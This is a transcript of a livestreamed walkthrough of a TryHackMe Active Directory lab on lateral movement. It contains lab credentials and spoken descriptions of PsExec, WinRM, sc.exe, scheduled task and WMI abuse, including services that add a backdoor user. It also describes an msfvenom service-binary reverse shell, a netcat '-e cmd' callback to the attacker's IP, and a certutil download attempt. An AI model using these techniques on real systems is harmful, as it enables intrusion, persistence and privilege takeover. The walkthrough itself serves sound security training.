Boom, and we are live. What is up, everyone? Tyler Ramsbey here, back with another video. Whether you're watching this on Twitch as it happens after the fact or catching me later on my YouTube channel, I just want to say it's an honor to have you hang out with me. We'll be on for the next, I don't know, hour and a half to 2 hours, and we are going to do some live hacking and just learning hands-on cybersecurity stuff. What we are going to do for this stream is TryHackMe released the most recent Active Directory network for lateral movement and pivoting. And the only thing I've done so far is I started the network, and Amoeba Man is on Discord with me, and he is a staff member of TryHackMe, and he told me this one might be broken. So we're gonna see what happens. We'll do some live troubleshooting on the spot. But like I said, I have not really even looked at this, so we're gonna go into it fresh. So I would encourage you to follow along with me if you would like. The way you can get here is if you go to the TryHackMe website. The easiest way is we have new rooms right here, and we have this lateral movement and pivoting. So if you click that, go ahead and start the network, because it takes a little bit of time to get everything going. That's the only thing I've done up to this point. And you are welcome to use the attack box if you want. I prefer to use my own VM. I think it helps with just learning troubleshooting and figuring things out. And I'm gonna go ahead and make a directory on my Kali Linux machine for this room and see if we can get things organized. I am just gonna call it, we'll just call it pivoting. So I'm gonna open this up, make directory pivoting, if I could learn how to spell, and it should be empty. Perfect. So let's go ahead and dive into it. And what I like to do, especially when I do this live, is take it slow, right? The goal is not to rush through. The goal is to learn as we do it. So let's take it slow. Let's read all of the text and see what we can learn. I'm gonna go pull up Twitch over on the side here so I can monitor the chat on here. So the couple of you joining on Twitch, welcome. Those of you on Discord, good to have you as well. So in this room, we will look at lateral movement, a group of techniques used by attackers to move around the network while creating as few alerts as possible. We'll learn about several common techniques used in the wild for this end and the tools involved. It is recommended to go through breaching AD and enumerate AD rooms before this one, and I have already did both of those. I think I did both of them in 2 parts. You can catch those on my YouTube channel. You can get to that on Twitch if you go to About, or if you just go to YouTube and search for Tyler Ramsbey, you should be able to find my page on there. But you are welcome to do those and follow along with my video if you so choose. So our learning objectives for this series for this room: familiarize yourself with the lateral movement techniques used by attackers, learn how to use alternative authentication material to move laterally, and learn different methods to use compromised hosts as pivots. And one second, I'm just gonna adjust my headphones. There we go, just adjusting the mode on them. All right, connecting to the network. This might be the most confusing part. Let's see if we can make our way through this. If you're using web-based attack box, we're not. Blah, blah, blah. I'm still gonna glance through here. We are not using the attack box. If you are, I encourage you to read that. I'm assuming we're gonna set this up similar to how we set it up before. DNS, blah, blah. You should take the time to note your IP. Other hosts, if you're gonna use your own attack machine, that is us, an OpenVPN config file will have been generated for you. Once you join the room, go to the access page, and I'm gonna have to do this on my VM. So let's go ahead and go here. And just like all the other networks, you have to download a separate VPN file. So just know that when you do networks, you can't use your normal TryHackMe VPN file. The networks are each gonna have a separate VPN file to get you on that network. Why is it making me do this? Those are the chimneys. I promise you I'm not a robot, it's really me. Come on, TryHackMe, I believe in you. Thank you. Okay, so you click networks over here, and lateral movement and pivoting. Let's go ahead and download the configuration file, save. Perfect, and we'll just do open VPN, home, Kali, downloads, and there it is. So far, so good. We'll just call this terminal for now. And see what our IP is. I believe that's going to be our IP for this room. Yeah, lateral movement. You can see the name right there. So that's our IP. Let's go ahead and see. We probably add something to our Etsy host file would be my guess, or maybe our DNS. Let's see what we need to do. So we use the Open VPN client. We did that. We did that. I guess we could verify that we have access here as it says. Change the lateral movement, and we do. Yep, so all that is good. You still need to configure DNS similar to what was shown above. It's important to note that although not used, the DC does log DNS requests. So we are going to use Kali. We're going to use our network manager, and we're going to set our DNS to, I'd assume, the domain controller right there. So that is the 10.200.80.101. So let's go ahead and do that. And the way you can do that is with the GUI. You can just do advanced network configuration. Here's our wired connection. Go over to IPv4 settings, and we can add an additional DNS server. I should turn numlock on, and I already forgot the IP after literally just looking at 10.200.80.101. Okay, at 10.200.80.101. Hit save. Close that out. Then we have to restart it, which I believe is systemctl restart network manager. That will just take a second. Make sure we have a connection there. Cool, so we have a connection to the internet. And then there was a command we can run to verify that we connected to the DNS, which is, let's go ahead and try to ping this host, it says. So let's give that a shot. Shoot. Oh, I think it was going. I was just impatient. Hold up. Yep. Just being a little bit slower, but we did get a reply back, so that is a good sign. See if there's anything I missed there. Oh, we can do the NS lookup, so we can also verify it this way to make sure the DNS is working, which it should be. There we go. Okay, first step is done. We were able to get on the network. If you were stuck on that part, just slow down and read through this. The only reason I kind of sped through it is I've done this a few times now. All right, requesting your credentials. To simulate an AD breach, you will be provided with your first set of AD creds. And what I'm going to do right now is just go ahead and get a side-by-side view. So attack box kind of does this automatically, but we're going to make our own little side-by-side view if my computer doesn't freeze in the process. This does kind of script some of the formatting on your Kali box, I've noticed when you run commands, so we'll see how it goes. Okay, to simulate an AD breach, you'll be provided with your first set of AD credentials. Once your networking setup has been completed on your attack box, navigate to there to get our credential pair. So let's go ahead and do that. And the reason for that is, of course, this is simulating after you got that initial low-level AD user. Oh, apparently it didn't copy. Let's try that again. Okay. How about copy link? There we go. So this is like we had a successful phishing email compromise, so we got some low-level creds. So here are our creds, and what we'll do is we'll go back to here, and we'll just echo those creds, and we'll just call it creds.txt. So we have them right there. Okay, to simulate AD breach, blah, blah, blah. The credential pair will provide you SSH access to the jump box. It can be seen as a jump hosted in the environment. Simulate a foothold that you have achieved. For SSH access, you can use the following command. And we are jenna.field at thmjump2.za.tryhackme.com. Yes. Password income 1982. All right, so far so good. Let's just rename this our shell. A note on reverse shells: if you're using the attack box, which we're not, let's see, for convenience, it's called lateral movement. So if you're using the attack box, read this. We're not using it, so I'm gonna keep moving through the network. Okay, what is lateral movement? Simply put, hey, actually, you know what? I need to start our timer. I try to do this in 25-minute intervals and take 5-minute breaks. That's also how I do my normal work day as well. I think it's just healthy. And during the 5-minute break, get up, walk around. So, timer has started. We are officially starting Let's do this. So what is lateral movement? Simply put, lateral movement is the group of techniques used by attackers to move around a network. And yes, Nate, I agree. Once an attacker has gained access to the first machine of a network, which we have here, it's our jump box, moving is essential for many reasons, including the following: reaching our goals as attackers, bypassing network restrictions, establishing additional points of entry, creating confusion, and avoiding detection. While many cyber kill chains reference lateral movement as an additional step on a linear process, it is actually part of a cycle. During the cycle, we use any available creds to perform lateral movement, giving us access to new machines where we elevate privileges and extract credentials if possible. With the newfound creds, the cycle starts again. So we have our initial recon. So in this simulation, that is done. Our initial compromise, that is done. Our established foothold, that's kind of done. We have this SSH foothold. What we're gonna work on is essential escalate privileges, internal recon, move laterally, maintain presence, and we keep going through this cycle until we complete our mission. Usually we'll repeat the cycle several times before reaching our final goal on the network. If our first foothold is a machine with very little access to other network resources, we might need to move laterally to other hosts that have more privs on the network. A quick example: suppose we are performing a red team engagement where our first goal is to reach an internal code repository, where we got our first compromise on the target network by using a phishing campaign. Usually, phishing campaigns are more effective against non-technical users, so our first access might be through a machine in the marketing department. Marketing workstations, well, I bet anyone who's watching this who might be in marketing just got offended. Marketing workstations will typically be limited through firewall policies to access any critical services on the network, including admin protocols, database ports, monitoring services, or any other that aren't required for their day-to-day labor, including code repositories. To reach sensitive hosts and services, we need to move to other hosts and pivot from there to our final goal. To this end, we could try elevating privs on the marketing workstations and extracting local user password hashes, maybe like crackmap exec, I think would do something like that. If we find a local admin, the same account may be present on other hosts. After doing some recon, we find a workstation with the name dev. We use a local admin password hash, so we're passing a hash attack and confirm it's owned by one of the developers in the company. From there, access to our target code repository is available. So we got our marketing PC, we did that through internal recon, we did a pass the hash attack, and then we got to the code repository. Notice that while lateral movement might need to be used to circumvent firewall restrictions, it is also helpful in evading detection. In our example, even if the marketing workstation had direct access to the code repository, it is probably desirable to connect to the developer's PC. This behavior would be less suspicious from the standpoint of a blue team analyst checking login audit logs. The attacker's perspective. There are several ways in which an attacker can move laterally. The simplest way would be to use standard administrative protocols such as WinRM, RDP, VNC, or SSH to connect to other machines around the network. This approach can be used to emulate regular users' behaviors somewhat, as long as some coherence is maintained when planning where to connect with what account. While a user from IT connecting to the web server via RDP might be usual and go under the radar, care must be taken not to attempt suspicious connections. Like, yo, why is the local admin connecting to the dev from the marketing PC? Attackers nowadays also have other methods of moving laterally, while making it somewhat more challenging for the blue team to detect what is happening effectively. While no technique should be considered infallible, we can at least attempt to be as silent as possible. In the following task, we will look at some of the most common lateral movement techniques available. Sweet. Administrators and UAC, or user access control. While performing most of the lateral movement techniques introduced throughout the room, we will mainly use admin creds. While one might expect that every single admin account would serve the same purpose, a distinction has to be made between two types of administrators: local accounts part of the local admin group, and domain accounts part of the local admin group. The differences we are interested in are restrictions imposed by UAC over local admins, except for the default administrator account. By default, local administrators won't be able to remotely connect to a machine and perform administrative tasks unless using an interactive session through RDP. Windows will deny any administrative tasks requested via RPC, SMB, or WinRM, since such administrators will be logged in with a filtered medium integrity token, preventing the account from doing privileged actions. The only local account that will get full privileges is a default administrator account. Domain accounts with local administrator privileges won't be subject to the same treatment and will be logged in with full administrative privileges. The security feature can be disabled if desired, and sometimes you will find no difference between local and domain accounts in the administrators group. Still, it is essential to keep in mind that should some of the lateral movement techniques fail, it might be due to using a non-default local admin where UAC is enforced. You can read more details about the security feature here. That just brings us up to Microsoft Docs. All right, spawning processes remotely. Drink of water first. This task will look at available methods an attacker has to spawn a process remotely, allowing him or her to run commands on machines where they have valid creds. Each of the techniques discussed uses slightly different ways to achieve the same purpose, and some of them might be a better fit for some specific scenarios. PSExec uses port 445 over TCP. Required group memberships is administrators. PSExec has been the go-to method when needing to execute processes remotely for years. It allows an administrator user to run commands remotely on any PC where he has access. I use this all the time in my job. I was actually messing around with it a little bit right before I went live on stream for work. PSExec is one of the many sysinternal tools and can be downloaded here. The way PSExec works is as follows. Connect to admin share, upload a service binary. PSExec uses psexec service.exe as the name. Connect to the service control manager to create and run a service named PSExec service and associate the service binary with this. Create some name pipes to handle those things. So we have this, we upload a service executable to this admin share essentially. The attacker creates and executes a service, and then we communicate through pipe PSExec, and that's our name pipe. To run PSExec, we only need to supply the required administrator creds for the remote host and the command we want to run. PSExec64.exe is available under tools and THM jump for your convenience. Let's go ahead and just navigate to that. And oh, we got Sharp Hound, we got Netcat, we got Mimikatz. Sweet. All right. So are we just supposed to do that to run? Yeah, I suppose so. What computer are we attacking? If we are on our jump box, are we? Maybe it's just showing us the syntax. Oh, let me scroll down. To run PSExec, we only need to supply the required administrators, blah, blah, blah. And THM jump 2 for your convenience. So I think it's just showing us the syntax for that. So you can see we're running PSExec 64. That's the machine IP. If we're launching on a certain computer running as administrator, there's our password, and we're launching command.exe. It's just a command prompt. Remote process creation using WinRM. Here's the port for that, 5985 over TCP. That's HTTP, and then of course HTTPS is 5986. Required group memberships, remote management users. Windows remote management, WinRM. You may have also heard of Evil WinRM on Kali. Is a web-based protocol used to send PowerShell commands to Windows hosts remotely. Most Windows Server installations will have WinRM enabled by default, making it an attractive attack vector. To connect to a remote PowerShell session from the command line, we can use the following command. And I don't see the tool here, but you're running that. You're specifying your user, specifying your password, and then what we're launching. We can achieve the same from PowerShell, but to pass different creds, we will need to create a PS credential object. Interesting, so for PowerShell, we're setting a variable for our username, we're setting a variable for our password, and secure password convert to secure string. That's just going to be the asterisk type stuff. Password is plain text. Credential, another variable, new object, system management, automation, PS credential, username, secure password. So we're just taking the things, our variables from up there, and passing it there. Once we have our PS cred object, we can create an interactive session using the enter PS session commandlet. And if you've never done that, it's kind of like an SSH connection, but through PowerShell. So if you're a system admin, you probably use this pretty often. I do it often just to poke around on computers, so I'm trying to figure something out, because the end user doesn't detect, at least not very easily, that you're open a PS session on their computer. PowerShell also includes the invoke commandlet, which runs script blocks remotely via WinRM. Credentials must be passed through a PS credential object as well. This is if you have a specific, so you can run a script block here. You can also, if there's a script that you're using, like I don't see any of these as script. I know there's a sharphound.ps1. You can actually pass actual scripts as well. I think it's slightly different syntax, but it's a very similar process. Remotely creating services using SC. Here's our ports for that. You can read through those on your own. Require group memberships administrators. Windows services can also be leveraged to run arbitrary commands since they execute a command when started. While the service executable is technically different from a regular application, if we configure a Windows service to run any application, it will execute it and fail afterwards. We can create a service on a remote host with sc.exe. Might be SoCat there. Oh no.
So I think SC and the scheduled task one and the WinRS one are still defaults of Windows. So they're native binaries. So if you run SC,
gotcha.
that should work.
Perfect. Let me just do that. Yeah, so show me the help file there. Oh, let's see. Windows services, blah, blah. We can create a service on a remote host with sc.exe. Oh, yes. I should just keep reading. When using SC, it will try to connect to the Service Control Manager, remote service program through RPC in several ways. Number one, a connection attempt will be made using DCE RPC. The client will first connect to the endpoint mapper, or EPM, at port 135, which serves as a catalog of available RPC endpoints and requests information on the Service CTL service program. The EPM, or endpoint mapper, will then respond with the IP and port to connect to that, which is usually a dynamic port in this range. Dynamic means it's going to change depending, like on when you make the connection. It's different each time. So here's our client. Where is Service CTL to EPM on port 135 to the server? It says, hey, it's on port 50123, and then we do the RPC bind. If the latter connection fails, SC will try to reach Service CTL through SMB named pipes, either on port 445 or 139, which is SMB or SMB over Net BIOS. You can see that there. We can create and insert a service named THM service using the following commands. And maybe I'll just try this. I mean, I don't know if we need to do .exe. So if we do service, and then, I mean, our target. So I should ask you, Amoeba Man, are we supposed to be running these commands on one of these machines, or is this just explaining the syntax right now?
So it's explaining the syntax for you, and then okay, what's going to happen is you're going to see at the end there's going to be a section where let's do the work now, and technically you can choose to do any of the techniques explained in the room to then do that task. So it's about all of them almost doing the same thing, but you would use a different one based on your specific attack. So for example, if some of the ports are faulted on a host-based firewall, then you can't, for example, move via service creation. Then you might choose to move through something like a scheduled task or through a PowerShell session. So it's about teaching you the different techniques, and then you can decide which one is going to be best based on the specific circumstances that you are faced with on your assessment.
Okay, cool. What we'll probably try to do is we'll just do every single one. We'll learn each one. So we'll read through it, and then when we get to that part, we'll just see how many we can do. Creating scheduled tasks remotely. Oh, let's see. So I was here. We create, okay, this is just showing how to start a service named THM service using the following commands, right? So we have sc.exe, our target, create THM service, so the name of the service, the bin path, net user. Oh, so we're creating the user, we're giving the path we're adding. So we're creating a service that essentially is adding a user to have like a backdoor account to establish persistence. Start means auto. I suppose every time the computer turns on, it's starting that up. Or when the service starts, I should say, it's gonna run that sc.exe target, and then we're gonna start the service, and then when the service starts, it should create the Munra user with that pass. The net user command will be executed when the service is started. Okay, just like how I explained it as I was looking at it. To stop and delete the service, we can then execute the following commands. Of course, you'd want to do that to clear up your tracks. Creating scheduled tasks remotely. Another Windows feature we can use as scheduled tasks. You can create and run one remotely with scheduled tasks available in any Windows installation. To create a task named THM Task 1, we can use the following commands. Scheduled tasks /s target/ru system create schedule task tr command payload to execute. So you could, so then you're specifying like how often to run. So you could run a scheduled task that I suppose pings back to your attack system. You could use this to probably establish some type of shell, and that's running the task. We set the scheduled type SC to once right there, which means the task is intended to run only once at the specified time and date. Since we will be running the task manually, the starting date, SD, and starting time won't matter anyways. Okay, so it doesn't matter what you put in there. Since the system will run the scheduled task, the command's output won't be available to us, making this a blind attack. Finally, to delete the scheduled task, we can use the following command and clean up after ourselves. All right, let's get to work. Let's get a drink of water. A lot of reading. To complete this exercise, you will need to connect to THM Jump 2, which we should still have our connection here. I know that sometimes if your network's not working, the networks do time out after a certain amount of inactivity. So if yours isn't working, try to restart it, or every once in a while just type a command here so you can ping the network. All right, to complete this exercise, you'll need to connect to THM Jump 2 using the creds assigned to you. We've already done that. If you haven't done so yet, click on the link, blah, blah. Once you have, we've done that. For this exercise, we assume we've already captured some creds with administrative access. Okay, so those are gonna be our creds. We'll show you how to use these creds to move laterally to THM IIS. So that's gonna be like the web server using sc.exe. Feel free to try the other methods as they should all work against it. So let's just glance real quick one more time at how this network is set up. So we are on this jump to box right here, and we're gonna connect to this, which I'm guessing is a web server, would be, there's some type of web server. Let's see, here we are. Blah, blah. We've already shown how to use SC to create a user on a remote system by using that user. We can also upload any binary we'd like to execute and associate it with the created service. However, if we try to run a reverse shell using this method, we will notice that the reverse shell disconnects immediately after execution. The reason for this is that service executables are different to standard.exe files. And therefore, non-service executables will end up being killed by the service manager almost immediately. Luckily for us, msfvenom supports the exe.service format, which I don't think I've ever used, which will encapsulate any payload we like inside a fully functional service executable, prevent it from getting killed. Very cool. Just gonna navigate to my folder here on my attack box. All right, to create a reverse shell, we can use the following command. Note, since you will be sharing the lab with others, you'll want to use a different file name for your payload instead of myservice.exe. Okay, that makes sense. To avoid overwriting someone else's payload. Okay, sounds good. So msfvenom -p for essentially type of payload. We're going to do Windows shell reverse TCP.f for file, and it looks like we're gonna have the file type of exe-service. lhost, this is gonna be your attacker IP, which I don't remember mine. You know, I should be like cool kids. Just IPA is the new way to do this kind of thing. Then
just
you get
a
the cool
quick
colors.
note there on something new that I never knew. Don't copy your IP, copy the word lateral movement.
Oh yeah, sure.
It actually works. I never actually knew that, but you can use that and it will automatically resolve the IP for you.
Sure. Good. I kind of knew that in the back of my head, but I never do it. But it, it makes a lot more sense. It saves on human error, and anything that can save my human errors is good. We'll use port 444. That's a standard msfvenom or Metasploit port. Of course, if you're doing this on a real assessment, you probably don't want to use the port that is like always blocked by firewalls, but we'll do it here. -O for what we want to call it, and it said don't call it myservice.exe, so I'm going to call it hacksmarter.exe. And once again, if you're kind of new to this, you'll notice I'm doing this on my attack machine, and here's the victim machine. So once we do it on the attack machine, we will transfer it over to our victim, I'd assume. Let's see. We will then proceed to use the T1 Leonard Summers credentials to upload our payload to the admin share of THMIIS using SMB client from our attack box. We got 5 minutes left, y'all, just so you know if you're waiting for that break. Using SMB client from our attack box. Okay, cool. Once our payload is created. And we're going to set up a listener, so we'll just go ahead and get that started as well. Let's open that, and do we have it there? There it is, hacksmarter.exe. So SMB client, if I can spell, -c, put hacksmarter.exe. We're going to specify our user, T1, which probably means that tier 1 admin, so this is a low-level admin account, but still has some administrative privileges, -w, za.tryhackme.com, must be the domain there. And whoops, you can always copy and paste this, but as I always say, I like to just type it because it helps me learn the syntax, and it's not as brainless that way. I think you learn it a little better when you type it and make mistakes as you type it, which you'll probably see me make mistakes. Looks like our password is easy pass forever. I think I'll make that my real admin password for work. It's a good password. Oh. Was that the password? Yeah, easy pass forever. Okay, let's see what happens. Okay, while that works or breaks, one of the two, let's go ahead and use exploit multi-handler, I believe. Options. So we should be able to set our L host to lateral movement. I think that's what it was called. Yep, so you can see it set right there. We have our L port to 444. I always like to set the payload to match what I do here. Oh yeah, and it has to do it there. I've just noticed sometimes, I mean, sometimes I'll catch it even if you don't set the payload, but I've noticed sometimes it also won't. But when I set the payload, it just seems to work better. So they have us set the L host. Oh, look at that, they did lateral movement as well. And then set the L port, which is already set for us. We set the payload, and then we can just run that. And we'll just call that interpreter. We'll hope that we get that. And go back to here. This doesn't seem to have worked. Might try to run it again, see if I missed anything. What's this say out? You can run the following one line on your Linux console, do the same. NT status connection reset. I wonder if I did something wrong. Let me just look at my syntax here. SMB client-c put hacksmart.exe-u t1 Leonard Summers-d za.tryhackme.com. We have that, which should match the server. We could, I mean, what we could try, I'd assume we'd be able to do the actual IP here. Let's try that. Whoops. I don't know if this will go any smoother or not. Maybe it's just not resolving the name for some reason. Well, or it's because I have the password right there on the end there. Let's try that. If that doesn't work, I'm gonna... Hey, so for those of you watching, if you ran into that issue, try to just replace the name right there with the direct IP. Maybe that's just a little bug, or I did something wrong, but either way, that seemed to have done it. Let's look down here. Alternatively, you can use the following one line on your Linux console to do the same. Oh, cool. So then I don't have to wait for MSF console to open. I didn't know that trick either. Actually, I think I saw Nate do this. Didn't you do this the other day, Nate? Is he still on here? Oh, no, he's not. I think I saw him do it, now that I think of it. All right, since sc.exe doesn't allow us to specify creds as part of the command, we need to use run as to spawn a new shell with T1 Leonard Summers access token. Still, we only have SSH access to the machine, so if we try something like that, the new command prompt would spawn on the user session, but we'd have no access to it. To overcome this problem, we can use run as to spawn a second reverse shell with T1 Leonard Summers access token. You know what, I'm looking at our timer. We have just 20 seconds. I think this might be a good break point. So I'm gonna go on break. I'm gonna step away from my computer and I'm gonna actually stop my timer quick. We'll stop that. Let's take a 5-minute break. Step away from your computer, walk around, jump up and down, do whatever you want, and we'll be back in exactly 5 minutes. Hey, what is up, everyone? Welcome back to the live stream. Let me get Twitch pulled back up, and then we will dive back into things. Oh, Nate's just watched on Twitch. Yes, I use -key-x a bit.
You're still on mute, Tyler.
Oh, shoot. Oh, I'm on mute for you. 1 second. Sorry, I was only on mute for you. It's coming over Twitch. I just forgot to unmute it on Discord.
Thanks.
Yeah, thank you. All right, let me go ahead and share my screen, and we'll pick up where we left off. Okay, so we were gonna spawn reverse shell as the T1 Leonard.Summers, and I was kind of curious about that because the last time we used the run as, I don't remember if it was one of these networks or if it was elsewhere, we had to RDP in order to get to work, because if you have an RDP session, then you can do that because it will spawn it, but you can't do it as SSH. Blah blah blah. To overcome this problem, we can use run as to spawn a second reverse shell with T1 Leonard.Summers access token. Very cool. I've never done that before. So, oh, we gotta go. This is gonna be on our victim machine. Make sure we still have a connection here. That we do. So run as net only user za.tryhackme.com. That's our domain. T1 Leonard.Summers. C, well, the case doesn't matter. Tools, there's, oh shoot, I accidentally hit enter. Can I go up? Okay, cool. Tools netcat64.exe-e. We're gonna launch command, and now we want our IP. And so that's that right there. I don't think the lateral movement trick will work on this part. Maybe. Yeah, I don't think it would. In my head, it doesn't work. Whoops. That's only going to work on our local machine. Come on. So we have that, and it looks like we're doing port 443. So it's going to get our listener set up. I mean, just simple netcat listener. Like that. Close. Well, this is called this terminal. Okay, let's check our syntax. 4443, let's close our quotation there and see what happens. Enter the password. That was like that easy pass, something super easy pass or something, easy pass forever. Easy pass forever. What did I do wrong there? I should have launched it as Leonard.
So just quickly there, you did nothing wrong there, right? If you look at that run as command, one of the flags you have there is net only. And if you remember from the enumerating AD network, right, the net only flag is a very special flag because essentially what it does is it still launches in the normal user context for you. Because, for instance, that T1 Leonard.Summers user might not have the ability or the permissions to actually log into the host that you're currently logged into. So what net only does is essentially just passes it, and it means that it will now use those credentials for network-only connections. So now when you run a command, while it looks like you're running it as Jenna Field, it will actually execute as the Leonard.Summers guy. And then one thing that I see that wasn't mentioned here is it might be good to test whether or not you specify that password correctly, because remember, net only will take in any password that you give it because it's not verifying the account anyway. So in your other terminal, if you wanted to, you could just run a dir on the sysvol directory to just basically make sure that it works. So that would just be your dir and then / za.tryhackme.com/sysvol. And if that works, you know that the password was correct. And if it wasn't, it will actually tell you that the password was incorrect. So yeah, credentials are working.
Okay, cool. That's good. Yeah, that'd be helpful to explain on here. Maybe they explain that, maybe they don't. No, I don't think they do. But that makes sense. Now that you say that, it's kind of clicking in my head. I remember that being explained in, what was that? It was probably, was that enumerating AD or breaching AD? Obviously it was one of those. I still remember which one.
Yes.
All right, the new command would spawn on the user session, but well, let's scroll down. We already did that. Finally, proceed to create a new service binary remotely by using SC, associating it with our uploaded binary. Okay, so we need to go ahead and grab that binary down. So we could go to C, probably go to like, whoops. Didn't mean to do that. Should be a temp folder. Yeah, we probably have right access to there. We'll see if we see anyone else. Nope, they haven't done it. So there's multiple ways you could transfer this over here. What I'm gonna do is just the standard Python web server. So Python 3-m HTTP server, we'll keep it at port 80, and then we can use something like cert util to grab that. We'll see if I remember the syntax by heart. Cert util URL cache dash F, I think, HTTP 10 dot whatever my IP is. Right there. I have my TryHackMe IP memorized. I just don't quite have this one memorized yet. Try that. And then we called it hacksmarter.exe, I think. And I think you have to do out file, maybe. I may have totally messed up that syntax. Yep, I think I did. Let's
just a quick note, why are you trying to copy that file over to Workstation?
Oh, I already did it. Yeah, I don't know why I'm trying to. I did it with, this is what happens when I take my 5-minute break. We already did that with the SMB client. Thank you. Good catch. It's already in the admin share.
Yes, and a note here as well. The nice thing is you do have SSH as well, which again, I like that you're testing cert util because you won't probably have SSH out there, but a SCP copy sometimes makes life easier. But yes, for real world cases, cert util is probably going to be the thing that works.
Every time I use SCP copy, I always have to look up the syntax for that. I don't know why I know cert util better. Probably just because I've used it more in CTFs. But all right. Let's see, where are we at? Create a new service remotely by using SC. So let's go ahead and give that a shot. And that's just the, so there's a chance because this didn't work before with the name. So if this doesn't work, you may just have to specify the IP on it. But we'll do create THM service 3249 bin path, and here is what we did. Well, let's just try this. So win directory. So how they want us to do it, I think it would be probably the admin one. I think is just specify and do the win directory there. I think, I don't know. Let's find out. We'll try both.
Just a note there. You just need a space for your bin path. SC is very, very peculiar about where its spaces is, and I think it's because you have the screen, split screen, that is not showing the space.
Probably is.
And then Windows specifies C Windows, which I'm pretty sure the admin share automatically places inside the Windows directory if you do something like SMB client.
Gotcha. Cool. So if we do hacksmarter.exe, start equals, and there's that space, I do see that space, start equals auto, and so that just means it's going to start automatically when we run the service. Let's try that, see if anything breaks. Open SC manager failed. Okay, let's glance at my syntax. We may just change the IP over. I have this bad shell. Let's try to do it by IP. So that's 10.200.80.201. Create THM service 3249 bin path equals space window hacksmarter.exe start equals auto. Oh, the specified service already exists. Unless somebody else made the service on the machine. We'll just try to run it, and if it doesn't, we'll just rerun that and use a different name for the service, unless it did create it the first time. Okay, Be sure to change the name. Okay, let's try to redo that and change the name of our service. I bet someone else already made it. It specifically says to change the name of your service, which would make sense. THM service. I'm gonna call it Hack Smarter service. We'll just call it Hack Smarter. 249 bin path equals space rotation window. I just realized I never started my timer. I always forget to do that crap. Let me start my timer. There we go. Okay. Window that hacksmarter.exe start equals auto. Create service success. Sweet. So once again, if you guys are watching this after the fact, it doesn't work the first time, just try to specify the actual IP. That seems to get past that just very minor bug. Be sure to change the name of your service. Once you have started the service, you should receive a connection in your attack box. I think we still have that running because that should be on that port 444. And I think it's just SC start service. If we scroll up, I know the syntax was up here. Yeah, sc.exe sc.exe target start THM service. I don't think we need target. Do I have to do this? Maybe I do need to do that.
So remember, you're trying to remote spawn a service, right? And if you just type SE start Hack Smarter, it's trying to look for a local service, which is why we always start there. But just maybe check. I think it might not work because I think you have a typo there for your Windows directory. But start it. See if WinDR also works for Windows directory. I'm interested to see.
Let's find out. So our target is going to be this. I'm just going to do the IP as well since it wasn't working before. So we should be sc.exe start, and then we should just be able to specify our service that we created, which was the Hack Smarter thing. Start service, open the file name, directory name, a volume label. Let's try this.
I think that's the WinDR one. That's fading.
That's my issue.
Oh, but also, yeah, just make sure it should be 201. I see you specified 21.
Oh, did I type the IP wrong there? I did. Okay, let's go back and retype our stuff. Let's go here. If I can just scroll up and see what I did wrong. Oh, yep, I see. I see. So let's retype it. Practice makes not perfect. And we're gonna specify the IP. And we're gonna create, we'll call it, we already created a Hack Smarter, so we're gonna call Tyler Wins. We'll call that the name of the service. Bin path equals space quotations WINDIR that, and am I looking? Yeah, I'm doing the right thing. Maybe if I get the correct backslash here, create Tyler Wins blah blah, and this is gonna be our Hack Smarter.exe start equals auto. Glance at this, sc.exe create Tyler Wins 3249 bin path windir hacksmart.exe start equals space auto. Let's try that. Create service success. Okay, so far so good. And now if we do our sc.exe start, we're going to specify our path because it's remote. 201, and now this is called Tyler Wins.
Just swap that start and that IP around. I don't know if it makes a difference, but yeah, just swap those two around.
Broke it. Scroll back up over here, I guess, if my scroll here doesn't work. 10.200.80.201 start. Start, and then we called it Tyler Wins. Let's just make sure I type that stuff correct, since I checked this up. Okay.
I think you named it Tyler Wins -3249.
Let's try that. Hey, look at that. We have an interpreter shell, hopefully. NT Authority System, so that's like the root equivalent on Windows. So we do a few more, but we just got something done. After running the flag.exe file on T1 Leonard's desktop and THMIS, what is the flag? Well, we'll find out. Jeez, I can't type tonight. Moving with services. All right, let's keep moving. Hey, what up, HunterBot? Sorry to even see you type. This HunterBot said on Twitch, this new network looks great. Yeah, it's interesting as long as you don't make silly mistakes. It's like a lot of content packed in here, though. I love it. All right, moving laterally using WMI. We can also perform many techniques discussed in the previous task differently by using Windows Management Instrumentation. WMI is Windows implementation of web-based enterprise management and an enterprise standard for accessing management information across devices. In simpler terms, WMI allows administrators to perform standard management tasks that attackers can abuse to perform lateral movement in various ways, which we shall discuss. Connecting to WMI from PowerShell. Before being able to connect to WMI using PowerShell commands, we need to create a PS credential object with our user and password. This object will be stored in the credential variable and utilized throughout the techniques on this task. Are we actually using this as our account? Just glancing through here, I think we are. Oh. Let's complete. Oh, that might be our account down there. Okay. We'll scroll back up. We'll read through this. So we already went through that once. We'll proceed to establish a WMI session using either of the following protocols. DCOM, RPC over IP, will be used for connecting to WMI. This protocol uses port 135, and those ports, just as explained, when using sc.exe. WSMan, WinRM, will be used for connecting to WMI. This protocol uses these ports and that port. To establish a WMI session in PowerShell, we can use the following commands and store the session on the session variable, which we will use throughout the room on different techniques. Opt variable, new CIEM session option, protocol DCOM, and then we're setting a session variable, new CIEM session, our computer name. It's going to be our target. That's going to be the IP that we're connecting to in this context, because that seems to be the easiest credential. We're just pulling down the credential variable from up there. Session option opt, error action stop. The new CIEM session option command then is used to configure the connection options for the WMI session, including the connection protocol. The options and creds are then passed to the new CIEM session commandlet to establish a session against a remote host. A remote process creation using WMI. We have these ports, require group memberships, administrators. Again, I feel like, no, is this correct? I feel like I read this already. I read some of it, I think. Blah, blah, are then passed. Okay. We can remotely spawn, send WMI request to the Win32 process class to spawn the process under the session we created before. Okay, interesting. So here's our command. Of course, you're doing PowerShell command set content path value. Monroe is here. Okay, so in this, we're just essentially touching a file. Invoke command, session, class name, method arguments, command line equals command. Notice that WMI won't allow you to see the output of any command, but will indeed create the process silently. So you could, create your own output like that. On legacy systems, the same can be done using wmic from the command prompt, which I have used that before at some point in time. Creating services remotely with WMI. We can create services with WMI through PowerShell. To create a service called THM Service 2, we can use the following command. Okay. Glancing through this, so there's the name, display name, path name. Oh, so this is a service that's going to create that Munra account, kind of backdoor user. Start service, start mode manual, and then we can get a handle on the service and start it with the following commands. Name, so service, blah, blah. We're going to filter it, name like THM Service 2. That matches up there. Invoke command, input object, start service. Fine, we can stop and delete the service with the following commands. Clean up after ourselves. Create and schedule tasks remotely with WMI. We can create and execute scheduled tasks by using some command lists available in Windows default installations. Payload must be split in command and arguments. So, okay, I see. So command and argument. And that's doing that same thing. We're creating a user with that password, and we're adding them. New scheduled task action, session, execute command, action, user, NT authority system. So, instead of this, we get a reverse shell. There's our task name. To delete the scheduled task after it has been used, we can use 